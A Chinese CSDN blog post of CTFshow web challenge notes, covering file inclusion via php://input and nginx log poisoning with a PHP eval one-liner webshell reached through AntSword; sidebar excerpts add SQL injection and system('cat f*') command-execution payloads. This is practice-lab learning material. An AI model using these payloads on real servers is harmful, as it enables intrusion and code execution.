ctfshow刷题笔记(web篇)

于 2021-03-15 21:56:56 发布 224 收藏
分类专栏: CTF web 文章标签: web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Gygert/article/details/114854289
版权

CTFshow web刷题笔记

感觉ctfshow的web比buu友好多了,buu前三题直接劝退

目录

PHP

web3

在这里插入图片描述
题目提示是php伪协议,然后文件含有漏洞
我们在后边加一句?url=php://input发送post请求然后抓个包
在这里插入图片描述
放包后显示了文件
在这里插入图片描述
然后直接cat文件即可
在这里插入图片描述
得到flag
在这里插入图片描述

web4

在这里插入图片描述
看起来和web3一样,但是web3的方法做不了
先到默认目录看一下日志

?url=/var/log/nginx/access.log

在这里插入图片描述
抓个包进行一下注入

<?php @eval($_POST['123']);?>#密码123

在这里插入图片描述
然后用蚁剑连接
在这里插入图片描述
成功找到flag
在这里插入图片描述

Gygert
关注
  • 0
    点赞
  • 0
    收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTFSHOW WEB题目
qq_45655564的博客
08-09 1555
web签到题 网页原代码中发现这个,base64解码就是flag web2 这道题目就是最简单的SQL注入了 发现万能密码可以成功。 于是后台查询语句猜测是select ‘column’ from ‘table’ where username=’$_POST[]’&password=’$_POST[]’ limit 1,1 自己猜的熬,不一定是完全正确的。 这样的话直接闭合前面的单引号就行了。 之后就是 123’ or 1=1 union select 1,2,3# 123’ or 1=1 un
ctfshow-xss
Vincent0sen的博客
09-13 119
ctfshow刷题记录
CTFshow web15
热门推荐
wangyuxiang946的博客
09-12 1万+
ctf.show萌新模块 web15关, 这一关是代码执行漏洞, 需要灵活的运用PHP的命令执行函数, 在上一关的基础上又过滤了 = ? > 关键字, 看起来已经没啥思路了, 但仔细一看, 它居然取消了对分号;的过滤, 这样一来就好办了, 继续上一关的曲线救国思路, 先GET请求传递一句话木马, 再用POST请求传递系统命令, 即可拿到 flag 进入页面后, 可以看到部分源码, 源码中提示 flag 就藏在 config.php 文件中 源码中通过GET请求获取参数, 并...
ctfshow(菜狗杯)
qq_62046696的博客
11-28 2662
这样的话cookie传入 =a ,然后破石头 a=b ,get b=c,request可以接收post和get请求,最后c因为用数组传参所以要带上后面的东西。这道题其实,看if($arr[]=1)这个等于号,是一个所以这是一个赋值的操作,肯定为true会进行die的操作,所以0=1随便赋值。然后input=加密传参,action=test,但是这里一直没成功,弄了好久才发现+被过滤掉了,需要一层的url 编码。的个数,%4e这样的形式只占用一个字节,是统计 a=%4e统计等号的右边。
[代码审计][备份泄露][时间盲注]CTFSHOW----WEB15(不会做以后补充)
Y4tacker的博客
08-06 6347
文章目录备份文件代码审计 备份文件 首先题目hint里面说了是源码泄露,我自己随便输入也发现了www.zip,但是还是走流程吧,用dirsearch工具,从这里我们也能发现突破口 代码审计 首先这是它给的压缩包,从里面我看了一下发现关键文件2020.php 发现是基于X-Forwarded-For,也就是XFF头的注入 <?php require_once './include/common.php'; $realip = real_ip(); $ipcount = $DB->count("
ctfshow简单题web1-15
qq_62984336的博客
03-10 395
ctfshow萌新 ctfshow萌新web1web2-4web5-7web5web6web7web9web10web11web12web13web14、15 总结:这几题主要都是正则匹配字符过滤的绕过,基本步骤都是源码中查看过滤规则->找到注入点->传入payload。只在web1中写了比较完整的步骤,剩下的题目主要只说对于字符过滤的绕过方法。 web1 1.手动注入。需要绕过函数inval,要求id不能大于999且id=1000,所以用'1000'字符代替数字1000 .
ctfshow web15-web25详细思路
2201_75316477的博客
01-15 5
position的位置即为我们的拼接方式,根据上述base64解码的tomcat密码的格式:用户名:密码 ----->则position的位数为3。3个拼接完成后,需要进行base64编码;
CTFshow 信息收集 web12 13 14 15
ChenD的学习笔记
11-07 161
CTFshow web入门 信息收集 web12 web13 web14 web15
ctfshow(刷题经历)
qq_62046696的博客
06-26 1086
1、打开以后看见filename=后面感觉是一个base64编码,接着解码一下,发现等于keys.txt,通常的源文件应该是index.php2、对index.php进行base64编码并作为新的filename的参数3、查看源文件,其里line变量起到控制行数的作用: http://114.67.246.176:13972/index.php?line=1&filename=aW5kZXgucGhw发现爆出了第一行隐含的代码,4、编写python脚本,查看全部源码 这样代码就出来了下图:5、分析PH
ctfshow(卷王杯)
qq_62046696的博客
09-24 389
首先我们的前提是if(isset($_POST['a']) && isset($_POST['b']) && isset($_POST['c']))} 这里的name就是上面的string传进来的,但是 $var = $this->$name;array_walk函数的作用就是遍历自定义函数,其中$fn的值为成员的值,prev为成员变量的名字。这是个等于号,相当于赋值,而对于数组无法赋值的情况就是当键溢出就行,可以看到上一句有。如果是数组的话,第一个是类,第二个是方法,第三个是属性。
CTFSHOW(命令执行)【学习记录】
ximo的博客
01-27 1844
学习记录web29web30web31 web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 对 flag 进行了过滤: 姿势学习: c=system('cat f*'); #正则表达式 c=
[ctfshow]入门
qq_61109509的博客
01-18 1359
3,misc3 打开后发现后缀名是bpg.那就找能打开bpg的工具 4,misc4 打开发现几个.txt,改后缀名拼接是flag 也用python获得图片中文字的方法 import pytesseract from PIL import Image pytesseract.pytesseract.tesseract_cmd = r'D:\应用\Tesseract-OCR\tesseract.exe' tessdata_dir_config = r'--tessdata-dir "D:\应用
ctfshow-萌新
qq_43618536的博客
07-14 1634
ctfshow-萌新
CTFshow--常用姿势
unexpectedthing的博客
07-06 866
常用姿势
CTFshow——命令执行
lee_maple的博客
04-23 4335
CTFshow——命令执行 Web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 可以看到,flag已经被过滤掉,先查看目录 我们可以使用通配符绕过flag的过滤 Web30 <?php
WEB-化整为零-无一幸免
最新发布
qq_31415417的博客
01-21 6
WEB-化整为零-无一幸免
CTFSHOW 萌新计划web9-15
羽的博客
04-03 2345
题目地址:http://ctf.show 0x01 web9 乍一看别被迷惑了,这个正则是字符串中包含 system、exec、highlight才能执行eval()。 if(preg_match("/system|exec|highlight/i",$c)){ eval($c); } 所以很简单,直接 c=highlight_file('conf...
ctfshow(web入门1-28)
weixin_45794666的博客
12-19 1216
极客大挑战 Crypto 二战情报员刘壮 考点:摩斯密码 通过[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tp0dMAf1-1605781237222)(C:\Users\J\AppData\Roaming\Typora\typora-user-images\image-20201021223545227.png)] 1.简介中直接看出是摩斯密码 2.通过在线网站直接解密得到flag 铠甲与萨满 考点:凯撒密码 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直
CTFshow-命令执行
weixin_44770698的博客
06-25 1246
ctfshow-web 命令执行
命令执行漏洞—CTFSHOW(简单利用)
weixin_44431280的博客
03-05 1085
命令执行漏洞—CTFSHOW(简单利用) 远程命令执行简介和原理可以参考文章Web安全—远程命令/代码执行(RCE) 远程命令执行1: 1,题目简介分析 代码分析:$_GET()函数读取URL传过来的C参数和值,然后使用preg_match函数判断传过来的参数值是否包含flag值(用来对传入的参数值进行过滤),然后使用eval()函数执行C参数传过来的值。 2,思路分析 通过信息收集判断网站操作系统类型,然后通过参数传入值执行操作系统命令,因为未对参数值进行限制,所以此处存在命令执行和代码执行漏洞 通过
CTF命令执行
qq_45086218的博客
03-02 1688
文章目录通配符*号?号常用命令其他姿势 本文以ctf.show网站题目为例,总结ctf中的命令执行姿势 通配符 if(!preg_match("/flag/i", $c)){ eval($c); } *号 c=system('cat *.php'); c=system('cat f*'); ?号 c=system('cat fla?????'); c=system('cat f?????hp'); 常用命令 system() passthru() exec() shell_e

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
©️2022 CSDN 皮肤主题:1024 设计师:我叫白小胖 返回首页
评论

打赏作者

Gygert

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值